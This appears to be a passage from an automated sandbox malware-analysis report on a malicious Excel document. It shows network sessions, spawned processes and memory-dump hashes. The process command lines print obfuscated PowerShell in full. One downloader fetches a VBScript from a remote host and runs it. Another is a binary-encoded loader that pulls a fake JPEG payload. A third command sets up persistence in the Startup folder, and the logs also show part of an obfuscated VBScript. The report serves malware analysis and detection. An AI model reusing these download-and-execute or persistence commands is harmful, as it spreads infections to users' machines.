                • 209.127.20.13
                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                0 | 192.168.2.22 | 49171 | 194.247.196.66 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | kBytes transferred | Direction | Data


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                1 | 192.168.2.22 | 49175 | 194.247.196.66 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Timestamp | kBytes transferred | Direction | Data


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                2 | 192.168.2.22 | 49172 | 209.127.20.13 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                Timestamp | kBytes transferred | Direction | Data
                Aug 26, 2022 00:13:15.295965910 CEST | 8 | OUT | GET /firm.txt HTTP/1.1
                Accept: text/html, application/xhtml+xml, */*
                Accept-Language: en-US
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Accept-Encoding: gzip, deflate
                Host: 209.127.20.13
                DNT: 1
                Connection: Keep-Alive
                Aug 26, 2022 00:13:15.406044006 CEST | 10 | IN | HTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:16 GMT
                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                Last-Modified: Wed, 24 Aug 2022 13:51:24 GMT
                ETag: "12d0-5e6fcfa067569"
                Accept-Ranges: bytes
                Content-Length: 4816
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: text/plain
                Aug 26, 2022 00:13:17.479048014 CEST | 14 | OUT | GET /favicon.ico HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: 209.127.20.13
                DNT: 1
                Connection: Keep-Alive
                Aug 26, 2022 00:13:17.590606928 CEST | 15 | IN | HTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:18 GMT
                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
                ETag: "78ae-51affc7a4c400"
                Accept-Ranges: bytes
                Content-Length: 30894
                Keep-Alive: timeout=5, max=99
                Connection: Keep-Alive
                Content-Type: image/x-icon


                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                3 | 192.168.2.22 | 49174 | 209.127.20.13 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                Timestamp | kBytes transferred | Direction | Data
                Aug 26, 2022 00:13:21.764863014 CEST | 48 | OUT | GET /remit.jpg HTTP/1.1
                Host: 209.127.20.13
                Connection: Keep-Alive
                Aug 26, 2022 00:13:21.876075029 CEST | 49 | IN | HTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:23 GMT
                Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
                Last-Modified: Wed, 24 Aug 2022 13:38:58 GMT
                ETag: "1c19aa-5e6fccd8fd0ee"
                Accept-Ranges: bytes
                Content-Length: 1841578
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: image/jpeg
                Aug 26, 2022 00:13:21.876157045 CEST53INData Raw: 4b 2c 4b 31 4b 31 31 31 2c 4b 31 4b 4b 30 2c 4b 31 30 31 30 31 31 2c 4b 31 4b 4b 30 2c 4b 31 4b 31 31 31 2c 4b 31 31 4b 31 30 2c 4b 31 31 30 31 4b 2c 4b 31 30 31 4b 31 2c 4b 31 4b 31 31 31 2c 4b 31 30 31 4b 31 2c 30 31 31 31 31 31 4b 2c 30 31 4b
                Data Ascii: K,K1K111,K1KK0,K101011,K1KK0,K1K111,K11K10,K1101K,K101K1,K1K111,K101K1,011111K,01K1K1,011KK0,01K0101,011KK0,01011K0,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,01110111,01101K0,01101K1,011011K,011K101,K101K0,K1K1K,011101K,0111K10,01110101,011K101,K1
                Aug 26, 2022 00:13:21.985343933 CEST55INData Raw: 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 4b 31 4b 31 2c 4b 4b 31 4b 31 2c 30 31 30 31 31 30 31 31 2c
                Data Ascii: 1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,KK1101,KK1010,KK1K1,KK1K1,01011011,011K010,01111K1,011101K,011K101,01011011,01011101,01011101,K1KK0,K1K1K,011K010,01101111,01110101,011101K,K1KK0,K111101,K1KK0,K1K1K,0111KK,01011K0,01010111,011KK1
                Aug 26, 2022 00:13:21.985383987 CEST56INData Raw: 52 2a 42 46 2c 52 2a 46 39 2c 52 2a 39 30 2c 52 2a 39 33 2c 52 2a 45 37 2c 52 2a 37 42 2c 52 2a 39 45 2c 52 2a 37 33 2c 52 2a 43 45 2c 52 2a 37 33 2c 52 2a 39 45 2c 52 2a 46 44 2c 52 2a 33 43 2c 52 2a 43 46 2c 52 2a 46 42 2c 52 2a 41 36 2c 52 2a
                Data Ascii: R*BF,R*F9,R*90,R*93,R*E7,R*7B,R*9E,R*73,R*CE,R*73,R*9E,R*FD,R*3C,R*CF,R*FB,R*A6,R*38,R*97,R*6E,R*05,R*09,R*00,R*48,R*F1,R*F3,R*DA,R*6B,R*00,R*5F,R*00,R*FE,R*DF,R*09,R*F8,R*EB,R*FF,R*4E,R*E3,R*A7,R*59,R*F9,R*A5,R*66,R*78,R*B0,R*EE,R*1B,R*FB,R*B
                Aug 26, 2022 00:13:21.985408068 CEST57INData Raw: 36 2c 52 2a 44 42 2c 52 2a 46 36 2c 52 2a 44 46 2c 52 2a 31 31 2c 52 2a 31 35 2c 52 2a 44 41 2c 52 2a 39 33 2c 52 2a 41 42 2c 52 2a 32 45 2c 52 2a 34 31 2c 52 2a 33 32 2c 52 2a 44 38 2c 52 2a 30 33 2c 52 2a 41 41 2c 52 2a 43 42 2c 52 2a 45 39 2c
                Data Ascii: 6,R*DB,R*F6,R*DF,R*11,R*15,R*DA,R*93,R*AB,R*2E,R*41,R*32,R*D8,R*03,R*AA,R*CB,R*E9,R*BB,R*55,R*2D,R*01,R*03,R*30,R*9B,R*0A,R*C6,R*D1,R*93,R*A4,R*58,R*D5,R*04,R*50,R*4F,R*55,R*87,R*76,R*C3,R*0E,R*A4,R*03,R*7A,R*19,R*52,R*FD,R*0F,R*5E,R*7B,R*ED,R
                Aug 26, 2022 00:13:21.985431910 CEST59INData Raw: 2a 37 32 2c 52 2a 30 46 2c 52 2a 30 41 2c 52 2a 35 44 2c 52 2a 43 42 2c 52 2a 43 41 2c 52 2a 32 35 2c 52 2a 30 37 2c 52 2a 36 30 2c 52 2a 38 44 2c 52 2a 45 41 2c 52 2a 39 30 2c 52 2a 36 39 2c 52 2a 45 33 2c 52 2a 34 44 2c 52 2a 38 42 2c 52 2a 32
                Data Ascii: *72,R*0F,R*0A,R*5D,R*CB,R*CA,R*25,R*07,R*60,R*8D,R*EA,R*90,R*69,R*E3,R*4D,R*8B,R*2A,R*85,R*7F,R*93,R*15,R*FE,R*08,R*D2,R*8A,R*67,R*50,R*CE,R*34,R*9C,R*A7,R*DC,R*08,R*B0,R*A9,R*F2,R*BF,R*28,R*97,R*DA,R*33,R*B3,R*AB,R*AA,R*5C,R*AA,R*92,R*61,R*BB
                Aug 26, 2022 00:13:21.985459089 CEST60INData Raw: 2c 52 2a 31 35 2c 52 2a 36 44 2c 52 2a 36 43 2c 52 2a 43 42 2c 52 2a 41 33 2c 52 2a 44 46 2c 52 2a 35 38 2c 52 2a 41 46 2c 52 2a 44 39 2c 52 2a 44 37 2c 52 2a 37 38 2c 52 2a 46 33 2c 52 2a 35 35 2c 52 2a 46 33 2c 52 2a 39 30 2c 52 2a 39 35 2c 52
                Data Ascii: ,R*15,R*6D,R*6C,R*CB,R*A3,R*DF,R*58,R*AF,R*D9,R*D7,R*78,R*F3,R*55,R*F3,R*90,R*95,R*FD,R*B1,R*75,R*89,R*7B,R*C8,R*4F,R*56,R*EF,R*01,R*84,R*F5,R*58,R*3E,R*88,R*6F,R*C6,R*72,R*F6,R*E0,R*A0,R*68,R*A8,R*31,R*34,R*90,R*0E,R*3A,R*74,R*41,R*BD,R*9E,R*
                Aug 26, 2022 00:13:21.985482931 CEST62INData Raw: 42 39 2c 52 2a 46 43 2c 52 2a 38 30 2c 52 2a 33 39 2c 52 2a 34 30 2c 52 2a 44 41 2c 52 2a 37 31 2c 52 2a 36 36 2c 52 2a 46 42 2c 52 2a 31 34 2c 52 2a 39 42 2c 52 2a 32 37 2c 52 2a 38 36 2c 52 2a 42 42 2c 52 2a 36 39 2c 52 2a 33 30 2c 52 2a 44 31
                Data Ascii: B9,R*FC,R*80,R*39,R*40,R*DA,R*71,R*66,R*FB,R*14,R*9B,R*27,R*86,R*BB,R*69,R*30,R*D1,R*96,R*A5,R*77,R*F3,R*C3,R*2B,R*87,R*66,R*B3,R*67,R*6B,R*36,R*8C,R*F5,R*B5,R*45,R*4A,R*B5,R*60,R*8A,R*EB,R*A1,R*35,R*48,R*CC,R*CC,R*33,R*6B,R*47,R*BB,R*99,R*2F,
                Aug 26, 2022 00:13:21.985508919 CEST63INData Raw: 52 2a 43 38 2c 52 2a 38 30 2c 52 2a 45 36 2c 52 2a 36 32 2c 52 2a 43 42 2c 52 2a 42 41 2c 52 2a 33 46 2c 52 2a 45 32 2c 52 2a 42 32 2c 52 2a 33 46 2c 52 2a 36 32 2c 52 2a 44 45 2c 52 2a 31 46 2c 52 2a 32 44 2c 52 2a 37 45 2c 52 2a 34 36 2c 52 2a
                Data Ascii: R*C8,R*80,R*E6,R*62,R*CB,R*BA,R*3F,R*E2,R*B2,R*3F,R*62,R*DE,R*1F,R*2D,R*7E,R*46,R*CB,R*FE,R*D0,R*22,R*0E,R*9D,R*6F,R*C5,R*36,R*17,R*F5,R*B7,R*8B,R*EF,R*ED,R*EF,R*90,R*A8,R*2E,R*42,R*DB,R*F7,R*96,R*77,R*86,R*61,R*6A,R*87,R*7F,R*59,R*F7,R*EE,R*4


                Session ID:0
                Source IP:192.168.2.22
                Source Port:49171
                Destination IP:194.247.196.66
                Destination Port:443
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Timestamp:2022-08-25 22:13:09 UTC
                kBytes transferred:0
                Direction:OUT
                Data:
                GET /sync/gith.vbs HTTP/1.1
                Host: kopadd.yunethosting.rs
                Connection: Keep-Alive

                Timestamp:2022-08-25 22:13:09 UTC
                kBytes transferred:0
                Direction:IN
                Data:
                HTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:09 GMT
                Server: Apache
                Last-Modified: Thu, 25 Aug 2022 05:51:44 GMT
                ETag: "c629a7-9c0-5e70a64709a1f"
                Accept-Ranges: bytes
                Content-Length: 2496
                Connection: close
                Content-Type: text/vbscript

                Timestamp:2022-08-25 22:13:09 UTC
                kBytes transferred:0
                Direction:IN
                Data Ascii:
                FwLRtmpy=WGJH()

                Private Function KdyH(str)
                HknBVqN = ""
                TTRZ="Mi" + "d(st" + "r,i,1)"
                For i=2-1 to Eval(elfjje())
                    char = Eval(TTRZ)
                    if(char<>" ") then
                    HknBVqN = HknBVqN+Mid(str,i,1)
                    End if
                Next
                KdyH = HknBVqN
                End Funct


                Session ID:1
                Source IP:192.168.2.22
                Source Port:49175
                Destination IP:194.247.196.66
                Destination Port:443
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Timestamp:2022-08-25 22:13:28 UTC
                kBytes transferred:2
                Direction:OUT
                Data:
                GET /sync/gith.vbs HTTP/1.1
                Host: kopadd.yunethosting.rs
                Connection: Keep-Alive

                Timestamp:2022-08-25 22:13:29 UTC
                kBytes transferred:2
                Direction:IN
                Data:
                HTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:29 GMT
                Server: Apache
                Last-Modified: Thu, 25 Aug 2022 05:51:44 GMT
                ETag: "c629a7-9c0-5e70a64709a1f"
                Accept-Ranges: bytes
                Content-Length: 2496
                Connection: close
                Content-Type: text/vbscript

                Timestamp:2022-08-25 22:13:29 UTC
                kBytes transferred:3
                Direction:IN
                Data Ascii:
                FwLRtmpy=WGJH()

                Private Function KdyH(str)
                HknBVqN = ""
                TTRZ="Mi" + "d(st" + "r,i,1)"
                For i=2-1 to Eval(elfjje())
                    char = Eval(TTRZ)
                    if(char<>" ") then
                    HknBVqN = HknBVqN+Mid(str,i,1)
                    End if
                Next
                KdyH = HknBVqN
                End Funct


                Target ID:0
                Start time:00:12:17
                Start date:26/08/2022
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13ff70000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:2
                Start time:00:12:21
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
                Imagebase:0xff780000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:3
                Start time:00:12:22
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
                Imagebase:0x13fc50000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Target ID:5
                Start time:00:12:26
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
                Imagebase:0xff570000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:6
                Start time:00:12:27
                Start date:26/08/2022
                Path:C:\Program Files\Internet Explorer\iexplore.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                Imagebase:0x13f340000
                File size:814288 bytes
                MD5 hash:4EB098135821348270F27157F7A84E65
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:8
                Start time:00:12:30
                Start date:26/08/2022
                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2
                Imagebase:0x13e0000
                File size:815304 bytes
                MD5 hash:8A590F790A98F3D77399BE457E01386A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:10
                Start time:00:12:35
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001
,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,0
1011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01110010,01100101,01101101,01101001,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
                Imagebase:0x13f3d0000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Target ID:12
                Start time:00:12:35
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'
                Imagebase:0x13f3d0000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                Target ID:14
                Start time:00:12:42
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
                Imagebase:0xff5d0000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:15
                Start time:00:12:42
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
                Imagebase:0x13f3d0000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET

                Target ID:17
                Start time:00:12:46
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
                Imagebase:0xffea0000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Target ID:18
                Start time:00:12:48
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs"
                Imagebase:0xffea0000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                  Memory Dump Source
                  • Source File: 00000003.00000002.934624491.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ff00280000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c7d078749796a0cb938d0a48f59d7a0228ec38375dac872ad84b5565a098099
                  • Instruction ID: 22422d8c73ca5d2a9dfe56fead22a93828224a7274a84b51bc5f524ae79ed94c
                  • Opcode Fuzzy Hash: 9c7d078749796a0cb938d0a48f59d7a0228ec38375dac872ad84b5565a098099
                  • Instruction Fuzzy Hash: AA417C2550FBC65FE74357785CA97A17FB0AF17210F0A01EBD488CB0A3D958595AC3A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000003.00000002.934624491.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ff00280000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9aed10b2827831e48fb27874f0f65b0eeb63ff0809bd84e8d48f40b03d1604e
                  • Instruction ID: 9c62777d71fd080068f6e208300d97eae57d944983b3522ffab22a0f2981bf90
                  • Opcode Fuzzy Hash: c9aed10b2827831e48fb27874f0f65b0eeb63ff0809bd84e8d48f40b03d1604e
                  • Instruction Fuzzy Hash: E641BC2190F7C24FE7938B3458A56A27FB19F63211F1A01EBD089CF4A3E9585C5DC762
                  Uniqueness

                  Uniqueness Score: -1.00%